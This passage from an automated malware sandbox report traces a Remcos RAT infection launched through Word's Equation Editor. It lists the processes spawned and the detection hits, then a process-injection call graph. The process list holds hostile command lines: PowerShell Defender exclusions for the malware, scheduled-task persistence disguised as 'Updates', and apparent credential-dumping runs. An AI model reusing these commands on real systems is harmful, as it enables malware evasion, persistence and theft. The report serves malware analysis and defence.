                        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                        Imagebase:0x13f080000
                        File size:1'423'704 bytes
                        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        General

                        Target ID:2
                        Start time:07:57:57
                        Start date:01/07/2024
                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        Wow64 process (32bit):true
                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                        Imagebase:0x400000
                        File size:543'304 bytes
                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:5
                        Start time:07:58:01
                        Start date:01/07/2024
                        Path:C:\Users\user\AppData\Roaming\plugman23456.scr
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Roaming\plugman23456.scr"
                        Imagebase:0xfb0000
                        File size:1'140'744 bytes
                        MD5 hash:28F77C9AF8CB3EA886714BBFC8326635
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.378816554.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.378816554.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000005.00000002.378816554.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                        Antivirus matches:
                        • Detection: 100%, Avira
                        • Detection: 100%, Joe Sandbox ML
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:6
                        Start time:07:58:02
                        Start date:01/07/2024
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\plugman23456.scr"
                        Imagebase:0x930000
                        File size:427'008 bytes
                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:8
                        Start time:07:58:03
                        Start date:01/07/2024
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
                        Imagebase:0x930000
                        File size:427'008 bytes
                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:9
                        Start time:07:58:03
                        Start date:01/07/2024
                        Path:C:\Windows\SysWOW64\schtasks.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpF0B6.tmp"
                        Imagebase:0xc30000
                        File size:179'712 bytes
                        MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:12
                        Start time:07:58:05
                        Start date:01/07/2024
                        Path:C:\Users\user\AppData\Roaming\plugman23456.scr
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Roaming\plugman23456.scr"
                        Imagebase:0xfb0000
                        File size:1'140'744 bytes
                        MD5 hash:28F77C9AF8CB3EA886714BBFC8326635
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.885917708.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.886068183.0000000000E9F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000C.00000002.885963497.0000000000748000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:low
                        Has exited:false

                        General

                        Target ID:13
                        Start time:07:58:08
                        Start date:01/07/2024
                        Path:C:\Windows\System32\taskeng.exe
                        Wow64 process (32bit):false
                        Commandline:taskeng.exe {8CF74EAD-4204-4C1F-8614-11C7F9468804} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
                        Imagebase:0xff6a0000
                        File size:464'384 bytes
                        MD5 hash:65EA57712340C09B1B0C427B4848AE05
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        General

                        Target ID:15
                        Start time:07:58:09
                        Start date:01/07/2024
                        Path:C:\Users\user\AppData\Roaming\znlzneAxBVd.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\znlzneAxBVd.exe
                        Imagebase:0x1170000
                        File size:1'140'744 bytes
                        MD5 hash:28F77C9AF8CB3EA886714BBFC8326635
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 100%, Avira
                        • Detection: 100%, Joe Sandbox ML
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:16
                        Start time:07:58:10
                        Start date:01/07/2024
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
                        Imagebase:0xea0000
                        File size:427'008 bytes
                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:18
                        Start time:07:58:10
                        Start date:01/07/2024
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
                        Imagebase:0xea0000
                        File size:427'008 bytes
                        MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:20
                        Start time:07:58:11
                        Start date:01/07/2024
                        Path:C:\Windows\SysWOW64\schtasks.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\znlzneAxBVd" /XML "C:\Users\user\AppData\Local\Temp\tmpE15.tmp"
                        Imagebase:0x470000
                        File size:179'712 bytes
                        MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:21
                        Start time:07:58:11
                        Start date:01/07/2024
                        Path:C:\Users\user\AppData\Roaming\plugman23456.scr
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\plugman23456.scr /stext "C:\Users\user\AppData\Local\Temp\bhyzucyduxfccvbqstsgmdbbressguvzg"
                        Imagebase:0xfb0000
                        File size:1'140'744 bytes
                        MD5 hash:28F77C9AF8CB3EA886714BBFC8326635
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:22
                        Start time:07:58:11
                        Start date:01/07/2024
                        Path:C:\Users\user\AppData\Roaming\plugman23456.scr
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\plugman23456.scr /stext "C:\Users\user\AppData\Local\Temp\ejlrnu"
                        Imagebase:0xfb0000
                        File size:1'140'744 bytes
                        MD5 hash:28F77C9AF8CB3EA886714BBFC8326635
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:23
                        Start time:07:58:12
                        Start date:01/07/2024
                        Path:C:\Users\user\AppData\Roaming\plugman23456.scr
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\AppData\Roaming\plugman23456.scr /stext "C:\Users\user\AppData\Local\Temp\odrcnntyd"
                        Imagebase:0xfb0000
                        File size:1'140'744 bytes
                        MD5 hash:28F77C9AF8CB3EA886714BBFC8326635
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:25
                        Start time:07:58:16
                        Start date:01/07/2024
                        Path:C:\Users\user\AppData\Roaming\znlzneAxBVd.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Roaming\znlzneAxBVd.exe"
                        Imagebase:0x1170000
                        File size:1'140'744 bytes
                        MD5 hash:28F77C9AF8CB3EA886714BBFC8326635
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.396020237.0000000000914000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.395655089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000019.00000002.395655089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000019.00000002.395655089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000019.00000002.395655089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000019.00000002.395655089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:26
                        Start time:07:58:21
                        Start date:01/07/2024
                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        Wow64 process (32bit):true
                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                        Imagebase:0x400000
                        File size:543'304 bytes
                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        Disassembly

                        Reset < >

                          Non-executed Functions

                          Function 0030F954 Relevance: .6, Instructions: 605COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.363969598.000000000030F000.00000004.00000020.00020000.00000000.sdmp, Offset: 0030F000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_30f000_EQNEDT32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4ab0effaf83b610f266091abd09576752d8d69936670e80b12dff036acafe698
                          • Instruction ID: 4869490d4a839514d571ca361913754b4ed8b4f3aa09404bfa33b4245a2c3e31
                          • Opcode Fuzzy Hash: 4ab0effaf83b610f266091abd09576752d8d69936670e80b12dff036acafe698
                          • Instruction Fuzzy Hash: 7FD1656240F7C09EE3078B3888256967F729E63264B1F85EBC8C4DF5B3D6194D0AC762
                          Function 0031418D Relevance: .5, Instructions: 465COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000002.00000002.363969598.000000000030F000.00000004.00000020.00020000.00000000.sdmp, Offset: 0030F000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_30f000_EQNEDT32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: df1d4980a34d2a4f7790949c5da749cebc5e8a53a6bf5f81bd301555b0c237cc
                          • Instruction ID: 1610e3c1dd3016885e6f1da896c1ad31fec9916136644700e8d85c0639c5c890
                          • Opcode Fuzzy Hash: df1d4980a34d2a4f7790949c5da749cebc5e8a53a6bf5f81bd301555b0c237cc
                          • Instruction Fuzzy Hash: C1C1896544E7C19FC71B8B74886A992BFB1AE6321430F85DBC4C6CF5B3D228494AC732

                          Execution Graph

                          Execution Coverage:17.3%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:13.3%
                          Total number of Nodes:135
                          Total number of Limit Nodes:6
                          execution_graph 11299 d704a5 11301 d700d4 11299->11301 11300 d7018c 11301->11300 11305 d72c31 11301->11305 11322 d72c7d 11301->11322 11338 d72c80 11301->11338 11306 d72c95 11305->11306 11307 d72c3a 11305->11307 11308 d72cbe 11306->11308 11354 d73314 11306->11354 11358 d73789 11306->11358 11365 d7316e 11306->11365 11370 d733e0 11306->11370 11374 d73583 11306->11374 11382 d73283 11306->11382 11387 d73145 11306->11387 11392 d73207 11306->11392 11397 d731ba 11306->11397 11402 d732de 11306->11402 11407 d730be 11306->11407 11411 d73370 11306->11411 11416 d73951 11306->11416 11307->11300 11308->11300 11323 d72c9a 11322->11323 11324 d72cbe 11323->11324 11325 d73314 2 API calls 11323->11325 11326 d73951 2 API calls 11323->11326 11327 d73370 2 API calls 11323->11327 11328 d730be 2 API calls 11323->11328 11329 d732de 2 API calls 11323->11329 11330 d731ba 2 API calls 11323->11330 11331 d73207 2 API calls 11323->11331 11332 d73145 2 API calls 11323->11332 11333 d73283 2 API calls 11323->11333 11334 d73583 2 API calls 11323->11334 11335 d733e0 2 API calls 11323->11335 11336 d7316e 2 API calls 11323->11336 11337 d73789 4 API calls 11323->11337 11324->11300 11325->11324 11326->11324 11327->11324 11328->11324 11329->11324 11330->11324 11331->11324 11332->11324 11333->11324 11334->11324 11335->11324 11336->11324 11337->11324 11339 d72c9a 11338->11339 11340 d72cbe 11339->11340 11341 d73314 2 API calls 11339->11341 11342 d73951 2 API calls 11339->11342 11343 d73370 2 API calls 11339->11343 11344 d730be 2 API calls 11339->11344 11345 d732de 2 API calls 11339->11345 11346 d731ba 2 API calls 11339->11346 11347 d73207 2 API calls 11339->11347 11348 d73145 2 API calls 11339->11348 11349 d73283 2 API calls 11339->11349 11350 d73583 2 API calls 11339->11350 11351 d733e0 2 API calls 11339->11351 11352 d7316e 2 API calls 11339->11352 11353 d73789 4 API calls 11339->11353 11340->11300 11341->11340 11342->11340 11343->11340 11344->11340 11345->11340 11346->11340 11347->11340 11348->11340 11349->11340 11350->11340 11351->11340 11352->11340 11353->11340 11420 1bf698 11354->11420 11424 1bf6a0 11354->11424 11355 d7324f 11355->11308 11436 1bf448 11358->11436 11440 1bf441 11358->11440 11359 d731e7 11359->11308 11360 d731d3 11360->11359 11428 1bf358 11360->11428 11432 1bf350 11360->11432 11366 d73174 11365->11366 11367 d731e7 11366->11367 11368 1bf358 ResumeThread 11366->11368 11369 1bf350 ResumeThread 11366->11369 11367->11308 11368->11367 11369->11367 11444 1bf578 11370->11444 11448 1bf571 11370->11448 11371 d733fe 11375 d73589 11374->11375 11377 d734e1 11375->11377 11379 1bf800 ReadProcessMemory 11375->11379 11452 1bf7f9 11375->11452 11376 d736fc 11376->11308 11377->11376 11380 1bf7f9 ReadProcessMemory 11377->11380 11456 1bf800 11377->11456 11379->11377 11380->11377 11383 d731d3 11382->11383 11384 d731e7 11383->11384 11385 1bf358 ResumeThread 11383->11385 11386 1bf350 ResumeThread 11383->11386 11385->11384 11386->11384 11388 d730d4 11387->11388 11389 d730ee 11387->11389 11388->11389 11460 1bfa38 11388->11460 11464 1bfa2c 11388->11464 11389->11308 11393 d73221 11392->11393 11393->11308 11394 d736fc 11393->11394 11395 1bf7f9 ReadProcessMemory 11393->11395 11396 1bf800 ReadProcessMemory 11393->11396 11394->11308 11395->11393 11396->11393 11398 d731d2 11397->11398 11400 1bf358 ResumeThread 11398->11400 11401 1bf350 ResumeThread 11398->11401 11399 d731e7 11400->11399 11401->11399 11403 d732c0 11402->11403 11404 d736fc 11403->11404 11405 1bf7f9 ReadProcessMemory 11403->11405 11406 1bf800 ReadProcessMemory 11403->11406 11404->11308 11405->11403 11406->11403 11409 1bfa38 CreateProcessA 11407->11409 11410 1bfa2c CreateProcessA 11407->11410 11408 d730ee 11408->11308 11409->11408 11410->11408 11412 d7338a 11411->11412 11414 1bf698 WriteProcessMemory 11412->11414 11415 1bf6a0 WriteProcessMemory 11412->11415 11413 d7380b 11414->11413 11415->11413 11418 1bf698 WriteProcessMemory 11416->11418 11419 1bf6a0 WriteProcessMemory 11416->11419 11417 d73979 11418->11417 11419->11417 11421 1bf6ec WriteProcessMemory 11420->11421 11423 1bf78b 11421->11423 11423->11355 11425 1bf6ec WriteProcessMemory 11424->11425 11427 1bf78b 11425->11427 11427->11355 11429 1bf39c ResumeThread 11428->11429 11431 1bf3ee 11429->11431 11431->11359 11433 1bf358 ResumeThread 11432->11433 11435 1bf3ee 11433->11435 11435->11359 11437 1bf491 Wow64SetThreadContext 11436->11437 11439 1bf50f 11437->11439 11439->11360 11441 1bf491 Wow64SetThreadContext 11440->11441 11443 1bf50f 11441->11443 11443->11360 11445 1bf5bc VirtualAllocEx 11444->11445 11447 1bf63a 11445->11447 11447->11371 11449 1bf5bc VirtualAllocEx 11448->11449 11451 1bf63a 11449->11451 11451->11371 11453 1bf84c ReadProcessMemory 11452->11453 11455 1bf8ca 11453->11455 11455->11377 11457 1bf84c ReadProcessMemory 11456->11457 11459 1bf8ca 11457->11459 11459->11377 11461 1bfabf CreateProcessA 11460->11461 11463 1bfd1d 11461->11463 11465 1bfabf CreateProcessA 11464->11465 11467 1bfd1d 11465->11467 11468 d701a2 11469 d700d4 11468->11469 11470 d7018c 11469->11470 11471 d72c31 12 API calls 11469->11471 11472 d72c80 12 API calls 11469->11472 11473 d72c7d 12 API calls 11469->11473 11471->11470 11472->11470 11473->11470

                          Executed Functions

                          Function 00D73263 Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID: (
                          • API String ID: 0-3887548279
                          • Opcode ID: 9cadef6b35a0985e0a254907979c7d8bf8f9fa792ad5837dd2819793fd1da340
                          • Instruction ID: f806004a7af57d687860113a5606dfccae29164a6bea35c4c23fba5de29da0a5
                          • Opcode Fuzzy Hash: 9cadef6b35a0985e0a254907979c7d8bf8f9fa792ad5837dd2819793fd1da340
                          • Instruction Fuzzy Hash: 4B111C74C0E259CBCB24CF64D8443FCB6B8AB1A305F50A096D08EA2192E7348BC5EF21
                          Function 00D7316E Relevance: .1, Instructions: 112COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c9d2cfd080ce5afaf35c90a1d58e6aca44a9e41ca4faff6ecacaf89745bf70ad
                          • Instruction ID: 238c330d84e0ae0807e9648883dc2a04b9961ee9be55e1b549c526e9d57f4dbc
                          • Opcode Fuzzy Hash: c9d2cfd080ce5afaf35c90a1d58e6aca44a9e41ca4faff6ecacaf89745bf70ad
                          • Instruction Fuzzy Hash: 0C41C974909268CFCB24CF64D8447E8BBB5AB4A315F14D1DAC44EA7292E7309BC5EF60
                          Function 00D73789 Relevance: .1, Instructions: 71COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 994ae166bcce9e742bc1a12e22807ee63e4353cea3e70693010be08ac6c301d3
                          • Instruction ID: a99d8982d693c4162f6937b4e0db9f84c4877235a6cb3966311d340a57e473f2
                          • Opcode Fuzzy Hash: 994ae166bcce9e742bc1a12e22807ee63e4353cea3e70693010be08ac6c301d3
                          • Instruction Fuzzy Hash: 4921EB74809214CFCB24CF64D9447F8BBB9AB4E315F14919AC44EA7292E7319B86EF14
                          Function 00D73283 Relevance: .1, Instructions: 62COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 76c6570100e720f435e0ae6339e6080433b05a057272fe4dc3744d2e7df7befb
                          • Instruction ID: eb0d6fa999e19150a3f593c4f6ee56815412148aa9f7cb07511c49b729027d6d
                          • Opcode Fuzzy Hash: 76c6570100e720f435e0ae6339e6080433b05a057272fe4dc3744d2e7df7befb
                          • Instruction Fuzzy Hash: 6D213074909254CFCB14CF64D9547F8BBF9AB0E311F1490DA848EA7292E7349A86DF14
                          Function 00D731BA Relevance: .1, Instructions: 56COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ce90180640d19a26133d018e1844afc9498bfde7b2975be5468386c5cb46430d
                          • Instruction ID: 258f6bff9824e16504108688c940022629855541a477932d43f2ad4e0e673614
                          • Opcode Fuzzy Hash: ce90180640d19a26133d018e1844afc9498bfde7b2975be5468386c5cb46430d
                          • Instruction Fuzzy Hash: 5711FB74809218CFCB24CF64D9447E8BBF9AB0E311F14919A848EA72A1E7309FC5EF54
                          Function 00D732AE Relevance: .0, Instructions: 47COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0a4836f21f403bb5f3a8d28275851845e877d5fa2816726b41886a143ecd5f9a
                          • Instruction ID: 73b794ebb4ef94cdd1556fd12d1ca2bf3cea374adbd2035b4602400e0c95d4a4
                          • Opcode Fuzzy Hash: 0a4836f21f403bb5f3a8d28275851845e877d5fa2816726b41886a143ecd5f9a
                          • Instruction Fuzzy Hash: A601807580E395CFCB11CB74D8542E87FF86B0B315F1491DAC48E962A2E7349A89EF21
                          Function 00D73500 Relevance: .0, Instructions: 35COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000005.00000002.378227213.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_d70000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9817edef21b367eeb325e2598853b1b29d989c4a5b4f9819225695b7e72d2041
                          • Instruction ID: 39e509d79503823d2cb0a2689137169ffe96b10ae650fd482377aa0aebb04bd4
                          • Opcode Fuzzy Hash: 9817edef21b367eeb325e2598853b1b29d989c4a5b4f9819225695b7e72d2041
                          • Instruction Fuzzy Hash: 8DF01275C0D215CFCB14CF64D8546F877F9AB0E305F14A0A6C08E92261E7349A99EF64
                          Function 001BFA2C Relevance: 1.8, APIs: 1, Instructions: 329processCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 988 1bfa2c-1bfad1 990 1bfb1a-1bfb42 988->990 991 1bfad3-1bfaea 988->991 994 1bfb88-1bfbde 990->994 995 1bfb44-1bfb58 990->995 991->990 996 1bfaec-1bfaf1 991->996 1004 1bfbe0-1bfbf4 994->1004 1005 1bfc24-1bfd1b CreateProcessA 994->1005 995->994 1006 1bfb5a-1bfb5f 995->1006 997 1bfaf3-1bfafd 996->997 998 1bfb14-1bfb17 996->998 1001 1bfaff 997->1001 1002 1bfb01-1bfb10 997->1002 998->990 1001->1002 1002->1002 1003 1bfb12 1002->1003 1003->998 1004->1005 1013 1bfbf6-1bfbfb 1004->1013 1024 1bfd1d-1bfd23 1005->1024 1025 1bfd24-1bfe09 1005->1025 1007 1bfb82-1bfb85 1006->1007 1008 1bfb61-1bfb6b 1006->1008 1007->994 1010 1bfb6f-1bfb7e 1008->1010 1011 1bfb6d 1008->1011 1010->1010 1014 1bfb80 1010->1014 1011->1010 1015 1bfc1e-1bfc21 1013->1015 1016 1bfbfd-1bfc07 1013->1016 1014->1007 1015->1005 1018 1bfc0b-1bfc1a 1016->1018 1019 1bfc09 1016->1019 1018->1018 1021 1bfc1c 1018->1021 1019->1018 1021->1015 1024->1025 1037 1bfe0b-1bfe0f 1025->1037 1038 1bfe19-1bfe1d 1025->1038 1037->1038 1041 1bfe11 1037->1041 1039 1bfe1f-1bfe23 1038->1039 1040 1bfe2d-1bfe31 1038->1040 1039->1040 1042 1bfe25 1039->1042 1043 1bfe33-1bfe37 1040->1043 1044 1bfe41-1bfe45 1040->1044 1041->1038 1042->1040 1043->1044 1045 1bfe39 1043->1045 1046 1bfe7b-1bfe86 1044->1046 1047 1bfe47-1bfe70 1044->1047 1045->1044 1050 1bfe87 1046->1050 1047->1046 1050->1050
                          APIs
                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001BFCFF
                          Memory Dump Source
                          • Source File: 00000005.00000002.377454406.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_1b0000_plugman23456.jbxd
                          Similarity
                          • API ID: CreateProcess
                          • String ID:
                          • API String ID: 963392458-0
                          • Opcode ID: b816742a5680359fbceb4a05de559eedf855a514b0ecd2dac051fc28f6e2c8a1
                          • Instruction ID: 34ab025b4ef33a21fc3da1abcefddd8d103178b4e487d2cb8a7b37fe484d9449
                          • Opcode Fuzzy Hash: b816742a5680359fbceb4a05de559eedf855a514b0ecd2dac051fc28f6e2c8a1
                          • Instruction Fuzzy Hash: 0DC11371D002198FDF24CFA8CD55BEEBBB1BB09304F1091AAD819B7250DB749A86CF95
                          Function 001BFA38 Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1052 1bfa38-1bfad1 1054 1bfb1a-1bfb42 1052->1054 1055 1bfad3-1bfaea 1052->1055 1058 1bfb88-1bfbde 1054->1058 1059 1bfb44-1bfb58 1054->1059 1055->1054 1060 1bfaec-1bfaf1 1055->1060 1068 1bfbe0-1bfbf4 1058->1068 1069 1bfc24-1bfd1b CreateProcessA 1058->1069 1059->1058 1070 1bfb5a-1bfb5f 1059->1070 1061 1bfaf3-1bfafd 1060->1061 1062 1bfb14-1bfb17 1060->1062 1065 1bfaff 1061->1065 1066 1bfb01-1bfb10 1061->1066 1062->1054 1065->1066 1066->1066 1067 1bfb12 1066->1067 1067->1062 1068->1069 1077 1bfbf6-1bfbfb 1068->1077 1088 1bfd1d-1bfd23 1069->1088 1089 1bfd24-1bfe09 1069->1089 1071 1bfb82-1bfb85 1070->1071 1072 1bfb61-1bfb6b 1070->1072 1071->1058 1074 1bfb6f-1bfb7e 1072->1074 1075 1bfb6d 1072->1075 1074->1074 1078 1bfb80 1074->1078 1075->1074 1079 1bfc1e-1bfc21 1077->1079 1080 1bfbfd-1bfc07 1077->1080 1078->1071 1079->1069 1082 1bfc0b-1bfc1a 1080->1082 1083 1bfc09 1080->1083 1082->1082 1085 1bfc1c 1082->1085 1083->1082 1085->1079 1088->1089 1101 1bfe0b-1bfe0f 1089->1101 1102 1bfe19-1bfe1d 1089->1102 1101->1102 1105 1bfe11 1101->1105 1103 1bfe1f-1bfe23 1102->1103 1104 1bfe2d-1bfe31 1102->1104 1103->1104 1106 1bfe25 1103->1106 1107 1bfe33-1bfe37 